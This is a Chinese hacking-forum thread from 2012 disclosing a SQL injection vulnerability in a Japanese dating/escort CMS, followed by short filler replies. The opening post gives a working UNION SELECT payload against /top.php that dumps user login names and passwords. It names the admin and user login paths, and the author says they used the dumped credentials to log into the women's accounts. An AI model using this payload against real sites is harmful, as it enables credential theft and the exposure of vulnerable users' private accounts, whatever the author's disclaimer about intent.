查看: 3199|回复: 24

日本某交友援交CMS注入漏洞

[复制链接]
发表于 2012-11-20 02:04:22 | 显示全部楼层 |阅读模式

找寻挖掘网络上的漏洞并不是什么见不得光的事,但是因为政治上的问题去入侵日本网站,也不是什么光彩的事情,只会成为炮灰而已
你以为你出了一口气,其实你和傻逼有什么区别。

前台新闻页面未做过滤或者正则,导致可以通过SQL注入语句将援交女的登陆信息爆出来
作者:YoCo Smart
来自:Silic Group Hacker Army
网站地址:http://blackbap.org
漏洞文件:/top.php

前台注入得到援交女的登陆名和登陆密码:


使用注入出来的援交女的登录Blog查看他们的揽客博文(亚麻蝶~打我电话吧~)


漏洞分析:
注入语句很简单,前台文件一模一样,数据库结构也是一样的,直接套公式好了

1
/top.php?mode=news&t=0+union+select+1,2,3,group_concat(DISTINCT+login_id,0x3a,pass,0x3c62723e),5,6,7,8,9,0,11,12,13+from+m_user%23



后台/admin.php
交友女登陆入口:/user.php

我想说,发本文的目的并非怂恿大家借钓鱼岛事件和918这个日子去黑日本网站,我也没涂鸦任何一个日本网站,just a fun
挖掘漏洞出于对技术的热爱,那么涂鸦别人又是出于什么目的呢?
不要扯淡告诉我你涂鸦是出于爱国,说白了,你为了出名,你不是为了出名,你也是出于骨子里的那股坏劲,爱国?你不查书不搜索,你知道今年是918多少年?别扯淡了

发表于 2012-11-20 14:27:45 | 显示全部楼层
努力~~各位。。。  
发表于 2012-11-26 12:51:17 | 显示全部楼层
谁能送我几分啊  
发表于 2014-10-26 06:21:03 | 显示全部楼层
顶下再看  
发表于 2014-11-5 13:21:57 | 显示全部楼层
不管你信不信,反正我信  
发表于 2014-12-5 19:42:52 | 显示全部楼层
ding   支持  
发表于 2014-12-29 03:02:01 | 显示全部楼层
朕要休息了..............  
发表于 2015-1-28 23:52:37 | 显示全部楼层
一个有信念者所开发出的力量,大于99个只有兴趣者。  
发表于 2015-3-2 23:21:04 | 显示全部楼层
不错的东西  持续关注  
发表于 2015-3-30 23:29:56 | 显示全部楼层
原来这样也可以  
高级模式
B Color Image Link Quote Code Smilies

本版积分规则